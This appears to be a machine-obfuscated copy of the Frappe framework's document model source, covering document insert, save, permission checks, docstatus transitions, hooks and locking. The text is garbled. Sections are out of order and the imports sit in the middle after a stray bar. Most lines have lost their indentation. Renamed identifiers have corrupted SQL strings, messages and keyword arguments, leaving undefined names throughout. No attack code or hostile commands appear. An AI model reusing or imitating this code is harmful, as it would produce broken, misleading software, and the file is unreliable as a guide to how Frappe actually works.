			# reset optional bookkeeping fields for brand-new documents
			for VAR_18 in optional_fields:
				self.set(VAR_18, None)
		else:
			self.validate_set_only_once()
def FUNC_24(self):
def FUNC_81(VAR_19):
if self.parentfield:
return "{} {} #{}: {} {}".format(frappe.bold(_(self.doctype)),
_("Row"), self.idx, _("Value cannot be negative for"), frappe.bold(_(VAR_19.label)))
else:
return _("Value cannot be negative for {0}: {1}").format(_(VAR_19.parent), frappe.bold(_(VAR_19.label)))
for VAR_19 in self.meta.get('fields', {'non_negative': ('=', 1),
'fieldtype': ('in', ['Int', 'Float', 'Currency'])}):
if flt(self.get(VAR_19.fieldname)) < 0:
VAR_87 = FUNC_81(VAR_19)
frappe.throw(VAR_87, frappe.NonNegativeError, title=_("Negative Value"))
def FUNC_25(self):
if frappe.flags.in_install == 'frappe': return
VAR_51 = self.meta.get_workflow()
if VAR_51:
FUNC_25(self)
if not self._action == 'save':
set_workflow_state_on_action(self, VAR_51, self._action)
	def FUNC_26(self):
		"""Throw CannotChangeConstantError if any "set only once" field was
		modified after the initial save.

		Table fields are compared row-wise; Date/Datetime/Time fields are
		compared as strings; everything else by equality.
		"""
		VAR_52 = self.meta.get_set_only_once_fields()
		if VAR_52 and self._doc_before_save:
			for field in VAR_52:
				VAR_97 = False
				VAR_26 = self.get(field.fieldname)
				VAR_53 = self._doc_before_save.get(field.fieldname)
				# VAR_81: module-level list of table fieldtypes
				# NOTE(review): the top-of-file import binds VAR_82 — confirm alias.
				if field.fieldtype in VAR_81:
					VAR_97 = not self.is_child_table_same(field.fieldname)
				elif field.fieldtype in ('Date', 'Datetime', 'Time'):
					VAR_97 = str(VAR_26) != str(VAR_53)
				else:
					VAR_97 = VAR_26 != VAR_53
				if VAR_97:
					frappe.throw(_("Value cannot be changed for {0}").format(self.meta.get_label(field.fieldname)),
						frappe.CannotChangeConstantError)
		return False
def FUNC_27(self, VAR_18):
VAR_26 = self.get(VAR_18)
VAR_53 = self._doc_before_save.get(VAR_18)
VAR_54 = True
if len(VAR_53) != len(VAR_26):
VAR_54 = False
else:
for i, VAR_21 in enumerate(VAR_53):
VAR_98 = VAR_26[i].as_dict(convert_dates_to_str = True)
VAR_99 = VAR_21.as_dict(convert_dates_to_str = True)
for VAR_43 in ('modified', 'modified_by', 'creation'):
del VAR_98[VAR_43]
del VAR_99[VAR_43]
if VAR_99 != VAR_98:
VAR_54 = False
break
return VAR_54
	def FUNC_28(self):
		"""Blank out values of fields whose permlevel the session user
		cannot read, on both the parent and its child tables.

		Administrator bypasses this entirely.
		"""
		if frappe.session.user == "Administrator":
			return
		VAR_55 = False
		VAR_56 = self.meta.fields.copy()
		for table_field in self.meta.get_table_fields():
			VAR_56 += frappe.get_meta(table_field.options).fields or []
		for VAR_19 in VAR_56:
			if VAR_19.permlevel > 0:
				VAR_55 = True
				break
		if not VAR_55:
			# no field in parent or children has a permlevel — nothing to hide
			return
		VAR_57 = self.get_permlevel_access('read')
		for VAR_19 in self.meta.fields:
			if VAR_19.permlevel and not VAR_19.permlevel in VAR_57:
				self.set(VAR_19.fieldname, None)
		for table_field in self.meta.get_table_fields():
			for VAR_19 in frappe.get_meta(table_field.options).fields or []:
				if VAR_19.permlevel and not VAR_19.permlevel in VAR_57:
					for child in self.get(table_field.fieldname) or []:
						child.set(VAR_19.fieldname, None)
def FUNC_29(self):
if self.flags.ignore_permissions or frappe.flags.in_install:
return
if frappe.session.user == "Administrator":
return
VAR_57 = self.get_permlevel_access()
VAR_58 = self.meta.get_high_permlevel_fields()
if VAR_58:
self.reset_values_if_no_permlevel_access(VAR_57, VAR_58)
if self.is_new(): return
for VAR_19 in self.meta.get_table_fields():
VAR_58 = frappe.get_meta(VAR_19.options).get_high_permlevel_fields()
if VAR_58:
for VAR_21 in self.get(VAR_19.fieldname):
VAR_21.reset_values_if_no_permlevel_access(VAR_57, VAR_58)
def FUNC_30(self, VAR_22='write'):
if not hasattr(self, "_has_access_to"):
self._has_access_to = {}
self._has_access_to[VAR_22] = []
VAR_59 = frappe.get_roles()
for perm in self.get_permissions():
if perm.role in VAR_59 and perm.get(VAR_22):
if perm.permlevel not in self._has_access_to[VAR_22]:
self._has_access_to[VAR_22].append(perm.permlevel)
return self._has_access_to[VAR_22]
def FUNC_31(self, VAR_18, VAR_19=None, VAR_22='read'):
if not VAR_19:
VAR_19 = self.meta.get_field(VAR_18)
return VAR_19.permlevel in self.get_permlevel_access(VAR_22)
def FUNC_32(self):
if self.meta.istable:
permissions = frappe.get_meta(self.parenttype).permissions
else:
VAR_85 = self.meta.permissions
return VAR_85
def FUNC_33(self):
if frappe.flags.in_import:
return
VAR_60 = frappe.new_doc(self.doctype, as_dict=True)
self.update_if_missing(VAR_60)
for VAR_19 in self.meta.get_table_fields():
VAR_60 = frappe.new_doc(VAR_19.options, as_dict=True)
VAR_26 = self.get(VAR_19.fieldname)
if isinstance(VAR_26, list):
for VAR_21 in VAR_26:
VAR_21.update_if_missing(VAR_60)
def FUNC_34(self):
VAR_61 = False
self._action = "save"
if not self.get('__islocal'):
if self.meta.issingle:
VAR_100 = frappe.db.sql("""select VAR_26 from tabSingles
where VAR_2=%s and field='modified' for update""", self.doctype)
VAR_100 = VAR_100 and VAR_100[0][0]
if VAR_100 and VAR_100 != cstr(self._original_modified):
VAR_61 = True
else:
VAR_101 = frappe.db.sql("""select VAR_100, VAR_23 from `tab{0}`
where VAR_3 = %s for update""".format(self.doctype), self.name, as_dict=True)
if not VAR_101:
frappe.throw(_("Record does not exist"))
else:
VAR_101 = tmp[0]
VAR_100 = cstr(VAR_101.modified)
if VAR_100 and VAR_100 != cstr(self._original_modified):
VAR_61 = True
self.check_docstatus_transition(VAR_101.docstatus)
if VAR_61:
frappe.msgprint(_("Error: CLASS_0 has been VAR_100 after you have opened it") \
+ (" (%s, %s). " % (VAR_100, self.modified)) \
+ _("Please refresh to get the latest document."),
VAR_33=frappe.TimestampMismatchError)
else:
self.check_docstatus_transition(0)
	def FUNC_35(self, VAR_23):
		"""Derive self._action from the stored docstatus `VAR_23` and the
		docstatus on this in-memory copy, enforcing the legal
		draft(0) -> submitted(1) -> cancelled(2) transitions.

		Raises DocstatusTransitionError for illegal transitions and
		ValidationError when editing a cancelled document.
		"""
		if not self.docstatus:
			self.docstatus = 0
		if VAR_23==0:
			if self.docstatus==0:
				self._action = "save"
			elif self.docstatus==1:
				self._action = "submit"
				self.check_permission("submit")
			else:
				raise frappe.DocstatusTransitionError(_("Cannot change VAR_23 from 0 to 2"))
		elif VAR_23==1:
			if self.docstatus==1:
				self._action = "update_after_submit"
				self.check_permission("submit")
			elif self.docstatus==2:
				self._action = "cancel"
				self.check_permission("cancel")
			else:
				raise frappe.DocstatusTransitionError(_("Cannot change VAR_23 from 1 to 0"))
		elif VAR_23==2:
			raise frappe.ValidationError(_("Cannot edit cancelled document"))
def FUNC_36(self):
for VAR_21 in self.get_all_children():
VAR_21.parent = self.name
VAR_21.parenttype = self.doctype
def FUNC_37(self):
for VAR_21 in self.get_all_children():
if not VAR_21.name:
FUNC_17(VAR_21)
def FUNC_38(self):
if self.flags.ignore_validate_update_after_submit:
return
self._validate_update_after_submit()
for VAR_21 in self.get_all_children():
if VAR_21.is_new() and self.meta.get_field(VAR_21.parentfield).allow_on_submit:
continue
VAR_21._validate_update_after_submit()
def FUNC_39(self):
if self.flags.ignore_mandatory:
return
VAR_62 = self._get_missing_mandatory_fields()
for VAR_21 in self.get_all_children():
VAR_62.extend(VAR_21._get_missing_mandatory_fields())
if not VAR_62:
return
for VAR_18, VAR_87 in VAR_62:
msgprint(VAR_87)
if frappe.flags.print_messages:
print(self.as_json().encode("utf-8"))
raise frappe.MandatoryError('[{VAR_2}, {VAR_3}]: {fields}'.format(
fields=", ".join((each[0] for each in VAR_62)),
VAR_2=self.doctype,
VAR_3=self.name))
def FUNC_40(self):
if self.flags.ignore_links or self._action == "cancel":
return
VAR_63, VAR_64 = self.get_invalid_links()
for VAR_21 in self.get_all_children():
VAR_86 = VAR_21.get_invalid_links(is_submittable=self.meta.is_submittable)
VAR_63.extend(VAR_86[0])
VAR_64.extend(VAR_86[1])
if VAR_63:
VAR_87 = ", ".join((each[2] for each in VAR_63))
frappe.throw(_("Could not find {0}").format(VAR_87),
frappe.LinkValidationError)
if VAR_64:
VAR_87 = ", ".join((each[2] for each in VAR_64))
frappe.throw(_("Cannot link cancelled document: {0}").format(VAR_87),
frappe.CancelledLinkError)
def FUNC_41(self, VAR_24=None):
VAR_65 = []
for VAR_19 in self.meta.get("fields", {"fieldtype": ['in', VAR_81]}):
if VAR_24:
if VAR_19.options==VAR_24:
return self.get(VAR_19.fieldname)
VAR_26 = self.get(VAR_19.fieldname)
if isinstance(VAR_26, list):
VAR_65.extend(VAR_26)
return VAR_65
	def FUNC_42(self, VAR_25, *VAR_0, **VAR_1):
		"""Run controller method `VAR_25` wrapped with the doc-event hook
		machinery, then fire notifications, webhooks and server scripts
		for the same event. Returns the (hook-merged) result."""
		if "flags" in VAR_1:
			del VAR_1["flags"]
		if hasattr(self, VAR_25) and hasattr(getattr(self, VAR_25), "__call__"):
			# delegate to the controller-defined method
			VAR_72 = lambda self, *VAR_0, **VAR_1: getattr(self, VAR_25)(*VAR_0, **VAR_1)
		else:
			# method not defined on the controller: run hooks around a no-op
			VAR_72 = lambda self, *VAR_0, **VAR_1: None
		VAR_72.__name__ = str(VAR_25)
		VAR_66 = CLASS_0.hook(VAR_72)(self, *VAR_0, **VAR_1)
		self.run_notifications(VAR_25)
		run_webhooks(self, VAR_25)
		run_server_script_for_doc_event(self, VAR_25)
		return VAR_66
def FUNC_43(self, VAR_25, *VAR_0, **VAR_1):
return self.run_method(VAR_25, *VAR_0, **VAR_1)
def FUNC_44(self, VAR_25):
if (frappe.flags.in_import and frappe.flags.mute_emails) or frappe.flags.in_patch or frappe.flags.in_install:
return
if self.flags.notifications_executed==None:
self.flags.notifications_executed = []
from frappe.email.doctype.notification.notification import evaluate_alert
if self.flags.notifications == None:
VAR_88 = frappe.cache().hget('notifications', self.doctype)
if VAR_88==None:
VAR_88 = frappe.get_all('Notification', fields=['name', 'event', 'method'],
filters={'enabled': 1, 'document_type': self.doctype})
frappe.cache().hset('notifications', self.doctype, VAR_88)
self.flags.notifications = VAR_88
if not self.flags.notifications:
return
def FUNC_82(VAR_67):
if not VAR_67.name in self.flags.notifications_executed:
evaluate_alert(self, VAR_67.name, VAR_67.event)
self.flags.notifications_executed.append(VAR_67.name)
VAR_68 = {
"on_update": "Save",
"after_insert": "New",
"on_submit": "Submit",
"on_cancel": "Cancel"
}
if not self.flags.in_insert:
VAR_68['on_change'] = 'Value Change'
for VAR_67 in self.flags.notifications:
VAR_89 = VAR_68.get(VAR_25, None)
if VAR_89 and VAR_67.event == VAR_89:
FUNC_82(VAR_67)
elif VAR_67.event=='Method' and VAR_25 == VAR_67.method:
FUNC_82(VAR_67)
@FUNC_2.__func__
def FUNC_45(self):
self.docstatus = 1
self.save()
@FUNC_2.__func__
def FUNC_46(self):
self.docstatus = 2
self.save()
@FUNC_2.__func__
def FUNC_47(self):
self._submit()
@FUNC_2.__func__
def FUNC_48(self):
self._cancel()
def FUNC_49(self, VAR_11=False):
frappe.delete_doc(self.doctype, self.name, VAR_11 = ignore_permissions, flags=self.flags)
	def FUNC_50(self):
		"""Dispatch the before_* controller events appropriate for the
		current self._action (save / submit / cancel / update_after_submit),
		then refresh the title field."""
		self.load_doc_before_save()
		self.reset_seen()
		if self._action in ("save", "submit"):
			self.run_method("before_validate")
		if self.flags.ignore_validate:
			return
		if self._action=="save":
			self.run_method("validate")
			self.run_method("before_save")
		elif self._action=="submit":
			self.run_method("validate")
			self.run_method("before_submit")
		elif self._action=="cancel":
			self.run_method("before_cancel")
		elif self._action=="update_after_submit":
			self.run_method("before_update_after_submit")
		self.set_title_field()
def FUNC_51(self):
self._doc_before_save = None
if not self.is_new():
try:
self._doc_before_save = frappe.get_doc(self.doctype, self.name)
except frappe.DoesNotExistError:
self._doc_before_save = None
frappe.clear_last_message()
	def FUNC_52(self):
		"""Dispatch the on_* controller events for the current action, then
		refresh caches, global search, version history and realtime
		listeners."""
		# NOTE(review): VAR_69 appears unused below — confirm intent.
		VAR_69 = self.get_doc_before_save()
		if self._action=="save":
			self.run_method("on_update")
		elif self._action=="submit":
			self.run_method("on_update")
			self.run_method("on_submit")
		elif self._action=="cancel":
			self.run_method("on_cancel")
			self.check_no_back_links_exist()
		elif self._action=="update_after_submit":
			self.run_method("on_update_after_submit")
		self.clear_cache()
		self.notify_update()
		update_global_search(self)
		self.save_version()
		self.run_method('on_change')
		if (self.doctype, self.name) in frappe.flags.currently_saving:
			frappe.flags.currently_saving.remove((self.doctype, self.name))
		self.latest = None
def FUNC_53(self):
frappe.clear_document_cache(self.doctype, self.name)
def FUNC_54(self):
if getattr(self.meta, 'track_seen', False):
frappe.db.set_value(self.doctype, self.name, "_seen", json.dumps([frappe.session.user]), VAR_27=False)
def FUNC_55(self):
if frappe.flags.in_patch: return
frappe.publish_realtime("doc_update", {"modified": self.modified, "doctype": self.doctype, "name": self.name},
VAR_2=self.doctype, docname=self.name, after_commit=True)
if not self.meta.get("read_only") and not self.meta.get("issingle") and \
not self.meta.get("istable"):
VAR_90 = {
"doctype": self.doctype,
"name": self.name,
"user": frappe.session.user
}
frappe.publish_realtime("list_update", VAR_90, after_commit=True)
def FUNC_56(self, VAR_18, VAR_26=None, VAR_27=True, VAR_28=False, VAR_29=False):
if isinstance(VAR_18, dict):
self.update(VAR_18)
else:
self.set(VAR_18, VAR_26)
if VAR_27 and (self.doctype, self.name) not in frappe.flags.currently_saving:
self.set("modified", now())
self.set("modified_by", frappe.session.user)
self.load_doc_before_save()
self.run_method('before_change')
frappe.db.set_value(self.doctype, self.name, VAR_18, VAR_26,
self.modified, self.modified_by, VAR_27=update_modified)
self.run_method('on_change')
if VAR_28:
self.notify_update()
self.clear_cache()
if VAR_29:
frappe.db.commit()
def FUNC_57(self, VAR_18):
return frappe.db.get_value(self.doctype, self.name, VAR_18)
def FUNC_58(self):
from frappe.model.delete_doc import check_if_doc_is_linked, check_if_doc_is_dynamically_linked
if not self.flags.ignore_links:
check_if_doc_is_linked(self, VAR_25="Cancel")
check_if_doc_is_dynamically_linked(self, VAR_25="Cancel")
def FUNC_59(self):
if (not getattr(self.meta, 'track_changes', False)
or self.doctype == 'Version'
or self.flags.ignore_version
or frappe.flags.in_install
or (not self._doc_before_save and frappe.flags.in_patch)):
return
VAR_70 = frappe.new_doc('Version')
if not self._doc_before_save:
VAR_70.for_insert(self)
VAR_70.insert(VAR_11=True)
elif VAR_70.set_diff(self._doc_before_save, self):
VAR_70.insert(VAR_11=True)
if not frappe.flags.in_migrate:
follow_document(self.doctype, self.name, frappe.session.user)
	@staticmethod
	def FUNC_60(VAR_6):
		"""Decorator: compose a controller method with app-level doc hooks.

		Hooks registered for (doctype, method) and ("*", method) run after
		the original method; each return value is folded into
		self._return_value (dicts are merged via update(), other truthy
		values replace the accumulator).
		"""
		def FUNC_83(self, VAR_71):
			# fold one return value into the accumulated _return_value
			if isinstance(VAR_71, dict):
				if not self.get("_return_value"):
					self._return_value = {}
				self._return_value.update(VAR_71)
			else:
				self._return_value = VAR_71 or self.get("_return_value")
		def FUNC_84(VAR_72, *VAR_73):
			# build a callable running the original method, then each hook
			def FUNC_86(self, VAR_25, *VAR_0, **VAR_1):
				FUNC_83(self, VAR_72(self, *VAR_0, **VAR_1))
				for VAR_6 in VAR_73:
					FUNC_83(self, VAR_6(self, VAR_25, *VAR_0, **VAR_1))
				return self._return_value
			return FUNC_86
		def FUNC_85(self, *VAR_0, **VAR_1):
			VAR_73 = []
			VAR_25 = VAR_6.__name__
			VAR_91 = frappe.get_doc_hooks()
			for handler in VAR_91.get(self.doctype, {}).get(VAR_25, []) \
				+ VAR_91.get("*", {}).get(VAR_25, []):
				VAR_73.append(frappe.get_attr(handler))
			VAR_92 = FUNC_84(VAR_6, *VAR_73)
			return VAR_92(self, VAR_25, *VAR_0, **VAR_1)
		return FUNC_85
def FUNC_61(self, VAR_25):
VAR_72 = getattr(self, VAR_25, None)
if not VAR_72:
raise NotFound("Method {0} not found".format(VAR_25))
elif not getattr(VAR_72, "whitelisted", False):
raise Forbidden("Method {0} not whitelisted".format(VAR_25))
def FUNC_62(self, VAR_18, VAR_30, VAR_31, VAR_32=None, VAR_33=None):
VAR_74 = {
"in": _("one of"),
"not in": _("none of"),
"^": _("beginning with"),
}
if not VAR_32:
doc = self
VAR_75 = VAR_32.get_value(VAR_18)
VAR_19 = VAR_32.meta.get_field(VAR_18)
VAR_31 = VAR_32.cast(VAR_31, VAR_19)
if not frappe.compare(VAR_75, VAR_30, VAR_31):
VAR_93 = VAR_32.meta.get_label(VAR_18)
VAR_94 = VAR_74.get(VAR_30, condition)
if VAR_32.parentfield:
VAR_87 = _("Incorrect VAR_26 in row {0}: {1} must be {2} {3}").format(VAR_32.idx, VAR_93, VAR_94, VAR_31)
else:
VAR_87 = _("Incorrect VAR_26: {0} must be {1} {2}").format(VAR_93, VAR_94, VAR_31)
msgprint(VAR_87, VAR_33=raise_exception or True)
def FUNC_63(self, VAR_34, VAR_33=None):
if not (isinstance(self.get(VAR_34), list) and len(self.get(VAR_34)) > 0):
VAR_93 = self.meta.get_label(VAR_34)
frappe.throw(_("Table {0} cannot be empty").format(VAR_93), VAR_33 or frappe.EmptyTableError)
def FUNC_64(self, VAR_32, VAR_35=None):
if not VAR_35:
fieldnames = (VAR_19.fieldname for VAR_19 in
VAR_32.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float", "Percent"]]}))
for VAR_18 in VAR_35:
VAR_32.set(VAR_18, flt(VAR_32.get(VAR_18), self.precision(VAR_18, VAR_32.parentfield)))
def FUNC_65(self):
return "/app/Form/{VAR_2}/{VAR_3}".format(VAR_2=self.doctype, VAR_3=self.name)
def FUNC_66(self, VAR_36='Comment', VAR_37=None, VAR_38=None, VAR_39=None, VAR_40=None, VAR_41=None):
VAR_66 = frappe.get_doc({
"doctype":"Comment",
'comment_type': VAR_36,
"comment_email": VAR_38 or frappe.session.user,
"comment_by": VAR_41,
"reference_doctype": self.doctype,
"reference_name": self.name,
"content": VAR_37 or VAR_36,
"link_doctype": VAR_39,
"link_name": VAR_40
}).insert(VAR_11=True)
return VAR_66
def FUNC_67(self, VAR_42=None):
if not VAR_42:
user = frappe.session.user
if self.meta.track_seen:
VAR_95 = self.get('_seen') or []
VAR_95 = frappe.parse_json(VAR_95)
if VAR_42 not in VAR_95:
_seen.append(VAR_42)
frappe.db.set_value(self.doctype, self.name, '_seen', json.dumps(VAR_95), VAR_27=False)
frappe.local.flags.commit = True
def FUNC_68(self, VAR_42=None):
if not VAR_42:
user = frappe.session.user
if hasattr(self.meta, 'track_views') and self.meta.track_views:
frappe.get_doc({
"doctype": "View Log",
"viewed_by": frappe.session.user,
"reference_doctype": self.doctype,
"reference_name": self.name,
}).insert(VAR_11=True)
frappe.local.flags.commit = True
def FUNC_69(self):
return hashlib.sha224(get_datetime_str(self.creation).encode()).hexdigest()
def FUNC_70(self):
VAR_76 = getattr(self, "_liked_by", None)
if VAR_76:
return json.loads(VAR_76)
else:
return []
def FUNC_71(self, VAR_43, VAR_26):
if not self.get("__onload"):
self.set("__onload", frappe._dict())
self.get("__onload")[VAR_43] = VAR_26
def FUNC_72(self, VAR_43=None):
if not VAR_43:
return self.get("__onload", frappe._dict())
return self.get('__onload')[VAR_43]
def FUNC_73(self, VAR_4, **VAR_1):
from frappe.utils.background_jobs import enqueue
if hasattr(self, '_' + VAR_4):
action = '_' + VAR_4
if file_lock.lock_exists(self.get_signature()):
frappe.throw(_('This document is currently queued for execution. Please try again'),
title=_('Document Queued'))
self.lock()
enqueue('frappe.model.document.execute_action', VAR_2=self.doctype, VAR_3=self.name,
VAR_4=action, **VAR_1)
	def FUNC_74(self, VAR_44=None):
		"""Take a file lock on this document.

		VAR_44: optional number of seconds to wait (polling once per
		second) for an existing lock to clear. Raises DocumentLockedError
		if the lock is still held.
		"""
		VAR_77 = self.get_signature()
		if file_lock.lock_exists(VAR_77):
			VAR_96 = True
			if VAR_44:
				for i in range(VAR_44):
					time.sleep(1)
					if not file_lock.lock_exists(VAR_77):
						VAR_96 = False
						break
			if VAR_96:
				raise frappe.DocumentLockedError
		file_lock.create_lock(VAR_77)
def FUNC_75(self):
file_lock.delete_lock(self.get_signature())
def FUNC_76(self, VAR_45, VAR_46):
if date_diff(self.get(VAR_46), self.get(VAR_45)) < 0:
frappe.throw(_('{0} must be after {1}').format(
frappe.bold(self.meta.get_label(VAR_46)),
frappe.bold(self.meta.get_label(VAR_45)),
), frappe.exceptions.InvalidDates)
def FUNC_77(self):
VAR_78 = frappe.get_all('ToDo',
fields=['owner'],
filters={
'reference_type': self.doctype,
'reference_name': self.name,
'status': ('!=', 'Cancelled'),
})
VAR_79 = set([assignment.owner for assignment in VAR_78])
return VAR_79
def FUNC_78(self, VAR_47):
from frappe.desk.doctype.tag.tag import DocTags
DocTags(self.doctype).add(self.name, VAR_47)
def FUNC_79(self):
from frappe.desk.doctype.tag.tag import DocTags
return DocTags(self.doctype).get_tags(self.name).split(",")[1:]
def FUNC_1(VAR_2, VAR_3, VAR_4, **VAR_1):
	"""Execute action `VAR_4` on document (VAR_2, VAR_3) from a background job.

	Unlocks the document first; on any failure, rolls back the
	transaction and records the error as a comment on the document.
	"""
	VAR_32 = frappe.get_doc(VAR_2, VAR_3)
	VAR_32.unlock()
	try:
		getattr(VAR_32, VAR_4)(**VAR_1)
	except Exception:
		frappe.db.rollback()
		# prefer the last user-facing message; fall back to the traceback
		if frappe.local.message_log:
			VAR_87 = json.loads(frappe.local.message_log[-1]).get('message')
		else:
			VAR_87 = '<pre><code>' + frappe.get_traceback() + '</pre></code>'
		VAR_32.add_comment('Comment', _('Action Failed') + '<br><br>' + VAR_87)
		VAR_32.notify_update()
|
# NOTE: `import .frappe` / `from pkg import .name` is invalid Python syntax
# (SyntaxError); all imports below are absolute.
from __future__ import unicode_literals, print_function

import hashlib
import json
import time

from six import iteritems, string_types
from werkzeug.exceptions import NotFound, Forbidden

import frappe
from frappe import _, msgprint, FUNC_61
from frappe.core.doctype.server_script.server_script_utils import run_server_script_for_doc_event
from frappe.desk.form.document_follow import follow_document
from frappe.integrations.doctype.webhook import run_webhooks
from frappe.model import optional_fields, VAR_82
# alias: several methods reference the table-fieldtypes list as VAR_81
from frappe.model import VAR_82 as VAR_81
from frappe.model.base_document import BaseDocument, get_controller
from frappe.model.naming import set_new_name
from frappe.model.workflow import set_workflow_state_on_action
from frappe.model.workflow import validate_workflow
from frappe.utils import flt, cstr, now, get_datetime_str, file_lock, date_diff
from frappe.utils.global_search import update_global_search
def FUNC_0(*VAR_0, **VAR_1):
	"""Return a document instance for the given arguments.

	Accepts a BaseDocument (returned as-is), a doctype string (optionally
	followed by a name or filters), or a dict / kwargs containing a
	"doctype" key. Raises ValueError on bad arguments and ImportError
	when no controller class exists for the doctype.
	"""
	if VAR_0:
		if isinstance(VAR_0[0], BaseDocument):
			# already a document object — pass through
			return VAR_0[0]
		elif isinstance(VAR_0[0], string_types):
			VAR_2 = VAR_0[0]
		elif isinstance(VAR_0[0], dict):
			# first positional argument is a dict of field values
			VAR_1 = VAR_0[0]
		else:
			raise ValueError('First non keyword argument must be a string or dict')
	if len(VAR_0) < 2 and VAR_1:
		if 'doctype' in VAR_1:
			VAR_2 = VAR_1['doctype']
		else:
			raise ValueError('"doctype" is a required key')
	VAR_5 = get_controller(VAR_2)
	if VAR_5:
		return VAR_5(*VAR_0, **VAR_1)
	raise ImportError(VAR_2)
class CLASS_0(BaseDocument):
	def __init__(self, *VAR_0, **VAR_1):
		"""Construct a document.

		Supported call forms:
		- (doctype,)              -> Single doctype; name == doctype
		- (doctype, name)         -> load the record from the database
		- (doctype, filters_dict) -> resolve the name by filters, then load
		- (dict,) or kwargs       -> build an in-memory document from values
		"""
		self.doctype = self.name = None
		self._default_new_docs = {}
		self.flags = frappe._dict()
		if VAR_0 and VAR_0[0] and isinstance(VAR_0[0], string_types):
			if len(VAR_0)==1:
				# single instance: the record name is the doctype itself
				self.doctype = self.name = VAR_0[0]
			else:
				self.doctype = VAR_0[0]
				if isinstance(VAR_0[1], dict):
					# resolve the record name from the given filters
					self.name = frappe.db.get_value(VAR_0[0], VAR_0[1], "name")
					if self.name is None:
						frappe.throw(_("{0} {1} not found").format(_(VAR_0[0]), VAR_0[1]),
							frappe.DoesNotExistError)
				else:
					self.name = VAR_0[1]
				if 'for_update' in VAR_1:
					self.flags.for_update = VAR_1.get('for_update')
			self.load_from_db()
			return
		if VAR_0 and VAR_0[0] and isinstance(VAR_0[0], dict):
			VAR_1 = VAR_0[0]
		if VAR_1:
			super(CLASS_0, self).__init__(VAR_1)
			self.init_valid_columns()
		else:
			raise ValueError('Illegal arguments')
@staticmethod
def FUNC_2(VAR_6):
frappe.whitelist()(VAR_6)
return VAR_6
def FUNC_3(self):
self.load_from_db()
def FUNC_4(self):
if not getattr(self, "_metaclass", False) and self.meta.issingle:
VAR_81 = frappe.db.get_singles_dict(self.doctype)
if not VAR_81:
single_doc = frappe.new_doc(self.doctype).as_dict()
VAR_81["name"] = self.doctype
del VAR_81["__islocal"]
super(CLASS_0, self).__init__(VAR_81)
self.init_valid_columns()
self._fix_numeric_types()
else:
VAR_21 = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1, for_update=self.flags.for_update)
if not VAR_21:
frappe.throw(_("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)
super(CLASS_0, self).__init__(VAR_21)
if self.name=="DocType" and self.doctype=="DocType":
from frappe.model.meta import DOCTYPE_TABLE_FIELDS
VAR_82 = DOCTYPE_TABLE_FIELDS
else:
VAR_82 = self.meta.get_table_fields()
for VAR_19 in VAR_82:
VAR_52 = frappe.db.get_values(VAR_19.options,
{"parent": self.name, "parenttype": self.doctype, "parentfield": VAR_19.fieldname},
"*", as_dict=True, order_by="idx asc")
if VAR_52:
self.set(VAR_19.fieldname, VAR_52)
else:
self.set(VAR_19.fieldname, [])
if hasattr(self, "__setup__"):
self.__setup__()
def FUNC_5(self):
if not getattr(self, "latest", None):
self.latest = frappe.get_doc(self.doctype, self.name)
return self.latest
def FUNC_6(self, VAR_7='read', VAR_8=None):
if not self.has_permission(VAR_7):
self.raise_no_permission_to(VAR_8 or VAR_7)
def FUNC_7(self, VAR_7="read", VAR_9=False):
if self.flags.ignore_permissions:
return True
return frappe.has_permission(self.doctype, VAR_7, self, VAR_9=verbose)
def FUNC_8(self, VAR_10):
frappe.flags.error_message = _('Insufficient Permission for {0}').format(self.doctype)
raise frappe.PermissionError
def FUNC_9(self, VAR_11=None, VAR_12=None, VAR_13=False,
VAR_14=None, VAR_15=None, VAR_16=True):
if self.flags.in_print:
return
self.flags.notifications_executed = []
if VAR_11!=None:
self.flags.ignore_permissions = VAR_11
if VAR_12!=None:
self.flags.ignore_links = VAR_12
if VAR_14!=None:
self.flags.ignore_mandatory = VAR_14
self.set("__islocal", True)
self.check_permission("create")
self._set_defaults()
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.run_method("before_insert")
self._validate_links()
self.set_new_name(VAR_15=set_name, VAR_16=set_child_names)
self.set_parent_in_children()
self.validate_higher_perm_levels()
self.flags.in_insert = True
self.run_before_save_methods()
self._validate()
self.set_docstatus()
self.flags.in_insert = False
if getattr(self.meta, "issingle", 0):
self.update_single(self.get_valid_dict())
else:
try:
self.db_insert()
except frappe.DuplicateEntryError as e:
if not VAR_13:
raise e
for VAR_21 in self.get_all_children():
VAR_21.db_insert()
self.run_method("after_insert")
self.flags.in_insert = True
if self.get("amended_from"):
self.copy_attachments_from_amended_from()
self.flags.update_log_for_doc_creation = True
self.run_post_save_methods()
self.flags.in_insert = False
if hasattr(self, "__islocal"):
delattr(self, "__islocal")
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
if not (frappe.flags.in_migrate or frappe.local.flags.in_install or frappe.flags.in_setup_wizard):
follow_document(self.doctype, self.name, frappe.session.user)
return self
def FUNC_10(self, *VAR_0, **VAR_1):
return self._save(*VAR_0, **VAR_1)
def FUNC_11(self, VAR_11=None, VAR_17=None):
if self.flags.in_print:
return
self.flags.notifications_executed = []
if VAR_11!=None:
self.flags.ignore_permissions = VAR_11
self.flags.ignore_version = frappe.flags.in_test if VAR_17 is None else VAR_17
if self.get("__islocal") or not self.get("name"):
self.insert()
return
self.check_permission("write", "save")
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.set_parent_in_children()
self.set_name_in_children()
self.validate_higher_perm_levels()
self._validate_links()
self.run_before_save_methods()
if self._action != "cancel":
self._validate()
if self._action == "update_after_submit":
self.validate_update_after_submit()
self.set_docstatus()
if self.meta.issingle:
self.update_single(self.get_valid_dict())
else:
self.db_update()
self.update_children()
self.run_post_save_methods()
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
return self
def FUNC_12(self):
from frappe.desk.form.load import get_attachments
for attach_item in get_attachments(self.doctype, self.amended_from):
VAR_83 = frappe.get_doc({
"doctype": "File",
"file_url": attach_item.file_url,
"file_name": attach_item.file_name,
"attached_to_name": self.name,
"attached_to_doctype": self.doctype,
"folder": "Home/Attachments"})
VAR_83.save()
def FUNC_13(self):
for VAR_19 in self.meta.get_table_fields():
self.update_child_table(VAR_19.fieldname, VAR_19)
def FUNC_14(self, VAR_18, VAR_19=None):
VAR_50 = []
if not VAR_19:
VAR_19 = self.meta.get_field(VAR_18)
for VAR_21 in self.get(VAR_19.fieldname):
VAR_21.db_update()
VAR_50.append(VAR_21.name)
